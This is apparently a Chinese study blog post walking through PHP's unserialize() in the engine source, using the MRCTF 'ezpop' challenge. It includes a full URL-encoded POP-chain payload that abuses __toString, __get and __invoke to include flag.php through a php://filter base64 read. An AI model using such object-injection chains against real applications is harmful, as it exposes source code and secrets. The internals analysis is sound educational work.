php内核学习三

一、前言

本次主要是从内核层看php反序列化的整个过程,下面贴代码(来自MRctf的ezpop)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
// Gadget class: calling an instance as a function includes the file named by $var.
class Modifier {
// Path that __invoke() hands to append(), and therefore to include().
protected $var;
// Passes $value straight to include(); no filtering is applied here.
public function append($value){
include($value);
}
// Magic method run when the object is used as a callable; forwards $var to append().
public function __invoke(){
$this->append($this->var);
}
}

// Holds a source name and a second value ($str); its magic methods read both.
class Show{
public $source;
public $str;
// Stores $file in $source and echoes a welcome line that contains it.
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
// String conversion returns the `source` property of whatever $str holds.
public function __toString(){
return $this->str->source;
}

// Magic method invoked by PHP after unserialize() has rebuilt the object.
// If $source matches one of the listed scheme names or "..", case-insensitively,
// it prints "hacker" and resets $source to "index.php".
// NOTE(review): preg_match() takes a string subject, so an object stored in $source
// would presumably be converted through __toString() here; confirm.
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}

// Holds a single value $p that __get() invokes as a function.
class Test{
public $p;
// Initialises $p to an empty array.
public function __construct(){
$this->p = array();
}

// Magic method PHP calls when an inaccessible or undefined property is read.
// $key (the property name) is ignored; $p is called as a function and its result returned.
public function __get($key){
$function = $this->p;
return $function();
}
}
// URL-encoded serialized payload: an outer object whose class name is written in lowercase
// ("show"), whose `source` is a Show object, whose `str` is a Test object, whose `p` is a
// Modifier object with `var` set to a php://filter URL targeting flag.php.
$c='O%3A4%3A%22show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A3%3A%22aaa%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D';
// Decode the percent-escapes to obtain the raw serialized string.
$a=urldecode($c);
// NOTE(review): $a was assigned on the line above, so the else branch looks unreachable here.
if(isset($a)){
// "@" suppresses any warnings or notices raised while unserializing.
@unserialize($a);
}
else{
// Fallback: build a default Show and print this file's highlighted source.
$a=new Show;
highlight_file(__FILE__);
}

二、具体函数及功能

前面到函数的执行过程就不一一赘述了,下面直接从unserialize函数开始

var.c PHP_FUNCTION(unserialize)

在此函数中先进行初始化,进入

PHP_VAR_UNSERIALIZE_INIT(var_hash)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/* Either allocate a fresh unserialize context or reuse the one stored in BG(unserialize). */
if (BG(serialize_lock) || !BG(unserialize).level) {
/* Taken when serialize_lock is set or no unserialize level is active: build a new context. */
d = emalloc(sizeof(struct php_unserialize_data));
d->last = &d->entries;
d->first_dtor = d->last_dtor = NULL;
d->allowed_classes = NULL;
d->ref_props = NULL;
d->cur_depth = 0;
/* Depth limit is copied from the BG(unserialize_max_depth) global. */
d->max_depth = BG(unserialize_max_depth);
d->entries.used_slots = 0;
d->entries.next = NULL;
/* The new context is stored in BG(unserialize) only when serialize_lock is not set. */
if (!BG(serialize_lock)) {
BG(unserialize).data = d;
BG(unserialize).level = 1;
}
} else {
/* A level is already active and no lock is held: reuse the stored context and bump the level. */
d = BG(unserialize).data;
++BG(unserialize).level;
}

此处建立一个php_unserialize_data结构体(php_unserialize_data_t是指向该结构体的指针类型),其中保存着和反序列化相关的信息。

在初始化反序列化后,进入

var_unserialize.re php_var_unserialize(retval, &p, p + buf_len, &var_hash)

1
2
3
4
5
6
7
PHPAPI int php_var_unserialize(UNSERIALIZE_PARAMETER)
{
var_entries *orig_var_entries = (*var_hash)->last;
zend_long orig_used_slots = orig_var_entries ? orig_var_entries->used_slots : 0;
int result;

result = php_var_unserialize_internal(UNSERIALIZE_PASSTHRU, 0);

此处进入反序列化处理的关键函数

var_unserialize.re php_var_unserialize_internal()

先进行词法解析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
if (yych <= 'a') {
if (yych <= 'O') {
if (yych <= 'C') {
if (yych >= 'C') goto yy4;
} else {
if (yych <= 'M') goto yy2;
if (yych <= 'N') goto yy5;
goto yy4;
}
} else {
if (yych <= 'R') {
if (yych >= 'R') goto yy6;
} else {
if (yych <= 'S') goto yy7;
if (yych >= 'a') goto yy8;
}
}
} else {
if (yych <= 'i') {
if (yych <= 'c') {
if (yych <= 'b') goto yy9;
} else {
if (yych <= 'd') goto yy10;
if (yych >= 'i') goto yy11;
}
} else {
if (yych <= 's') {
if (yych <= 'q') goto yy2;
if (yych <= 'r') goto yy12;
goto yy13;
} else {
if (yych == '}') goto yy14;
}
}
}

这里按首字符区分所有的类型标识,解析出开头的字符O后,进入object的解析流程。在object的解析流程中,会有取类名长度的操作:

1
2
3
4
5
6
7
8
9
/* Accumulate the run of ASCII digits starting at p into result as a decimal number. */
/* NOTE(review): no overflow check on result is visible in this excerpt. */
while (1) {//read the number digit by digit in a while loop
cursor = *p;
if (cursor >= '0' && cursor <= '9') {
/* Shift the value so far one decimal place and add the new digit. */
result = result * 10 + (size_t)(cursor - (unsigned char)'0');
} else {
/* First non-digit byte ends the number; p is left pointing at it. */
break;
}
p++;
}

取完类名长度后,执行初始化类名变量的操作class_name = zend_string_init(str, len, 0);

之后再判断反序列化的类是不是被允许的类(这是php7的一个新特性,可以控制允许进行反序列化操作的类)

1
2
3
4
5
if(!unserialize_allowed_class(class_name, var_hash)) {
incomplete_class = 1;
ce = PHP_IC_ENTRY;
break;
}

之后开始根据传入的类名寻找类ce = zend_lookup_class(class_name);

zend_execute_api.c zend_lookup_class_ex()

这个函数主要是查找类的zend_class_entry过程

其中有段代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* Choose the lookup key: use `key` when one is supplied, otherwise derive it from `name`. */
if (key) {
lc_name = key;
} else {
/* A NULL or zero-length name cannot be looked up. */
if (name == NULL || !ZSTR_LEN(name)) {
return NULL;
}

/* A leading backslash is skipped; the remainder is copied in lowercase. */
if (ZSTR_VAL(name)[0] == '\\') {
lc_name = zend_string_alloc(ZSTR_LEN(name) - 1, 0);
zend_str_tolower_copy(ZSTR_VAL(lc_name), ZSTR_VAL(name) + 1, ZSTR_LEN(name) - 1);
} else {
lc_name = zend_string_tolower(name);//uppercase letters in the serialized class name are lowercased here
}
}
/* Look the chosen key up in the class table held in the executor globals. */
zv = zend_hash_find(EG(class_table), lc_name);

这段代码中的tolower将我们传入的大写的序列化字符串的类名转成小写。然后在EG中寻找类。

所有PHP脚本中定义的类以及内核、扩展中定义的内部类通过一个以“类名”作为索引的哈希表存储,这个哈希表保存在Zend引擎global变量中:zend_executor_globals.class_table(即:EG(class_table))

找到类后,将类的信息给到ce变量,然后继续解析类中属性的个数,解析完成以后查看是否有__unserialize()。查找方式和之前类名的查找类似,都是哈希表查找,不同的是这里以方法名"__unserialize"为键,在该类自己的方法表ce->function_table中查找,而不是在EG(class_table)中查找。

1
2
has_unserialize = !incomplete_class
&& zend_hash_str_exists(&ce->function_table, "__unserialize", sizeof("__unserialize")-1);

紧接着再初始化对象object_init_ex(rval, ce),初始化完成后进入

object_common(UNSERIALIZE_PASSTHRU, elements, has_unserialize)

在这个函数中会查看是否有__wakeup函数

1
2
has_wakeup = Z_OBJCE_P(rval) != PHP_IC_ENTRY
&& zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup", sizeof("__wakeup")-1);

之后进入Z_OBJPROP_P(rval),这个函数中有个关键函数rebuild_object_properties(zobj)

zend_object_handlers.c rebuild_object_properties()

1
2
3
4
5
6
7
8
9
10
11
12
/* Walk every property descriptor of the class and add each non-static one to zobj->properties. */
ZEND_HASH_FOREACH_PTR(&ce->properties_info, prop_info) {
if (!(prop_info->flags & ZEND_ACC_STATIC)) {
/* Collect the union of the flags of all non-static properties. */
flags |= prop_info->flags;

/* Flag the table when the object's slot for this property is still IS_UNDEF. */
if (UNEXPECTED(Z_TYPE_P(OBJ_PROP(zobj, prop_info->offset)) == IS_UNDEF)) {
HT_FLAGS(zobj->properties) |= HASH_FLAG_HAS_EMPTY_IND;
}

/* Keyed by property name; presumably stores an indirect pointer to the slot rather than a copy (TODO confirm). */
_zend_hash_append_ind(zobj->properties, prop_info->name,
OBJ_PROP(zobj, prop_info->offset));
}
} ZEND_HASH_FOREACH_END();

通过一个foreach宏遍历ce(保存类信息的结构体)中的properties_info,将source和str等非静态属性以属性名为键加入对象的属性表zobj->properties中

现在又回到object_common()函数中

其中有个很重要的函数process_nested_data(UNSERIALIZE_PASSTHRU, ht, elements, Z_OBJ_P(rval))

var_unserialize.re process_nested_data()

1
2
3
4
5
6
7
8
9
10
11
while (elements-- > 0) {
zval key, *data, d, *old_data;
zend_ulong idx;
zend_property_info *info = NULL;

ZVAL_UNDEF(&key);

if (!php_var_unserialize_internal(&key, p, max, NULL, 1)) {
zval_ptr_dtor(&key);
goto failure;
}

这个函数继续调用php_var_unserialize_internal()进行取值操作,然后就是之前的解析类型名,解析长度,解析完成后返回此函数,进行下一步,属性名解析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
if ((unmangled_class == NULL || !strcmp(unmangled_class, "*") || !strcasecmp(unmangled_class, ZSTR_VAL(obj->ce->name)))
&& (existing_propinfo != NULL)
&& (existing_propinfo->flags & ZEND_ACC_PPP_MASK)) {
if (existing_propinfo->flags & ZEND_ACC_PROTECTED) {
new_key = zend_mangle_property_name(
"*", 1, ZSTR_VAL(unmangled), ZSTR_LEN(unmangled), 0);
zend_string_release_ex(unmangled, 0);
} else if (existing_propinfo->flags & ZEND_ACC_PRIVATE) {
if (unmangled_class != NULL && strcmp(unmangled_class, "*") != 0) {
new_key = zend_mangle_property_name(
unmangled_class, strlen(unmangled_class),
ZSTR_VAL(unmangled), ZSTR_LEN(unmangled),
0);
} else {
new_key = zend_mangle_property_name(
ZSTR_VAL(existing_propinfo->ce->name), ZSTR_LEN(existing_propinfo->ce->name),
ZSTR_VAL(unmangled), ZSTR_LEN(unmangled),
0);
}
zend_string_release_ex(unmangled, 0);
} else {
ZEND_ASSERT(existing_propinfo->flags & ZEND_ACC_PUBLIC);
new_key = unmangled;
}

此处根据类中已声明属性的可见性(private、protected或public)生成对应的属性名:protected和private属性会通过zend_mangle_property_name()重新生成带前缀的属性名,public属性则直接使用原名。处理完成后继续进入php_var_unserialize_internal()解析属性值,然后将属性值写入生成的对象中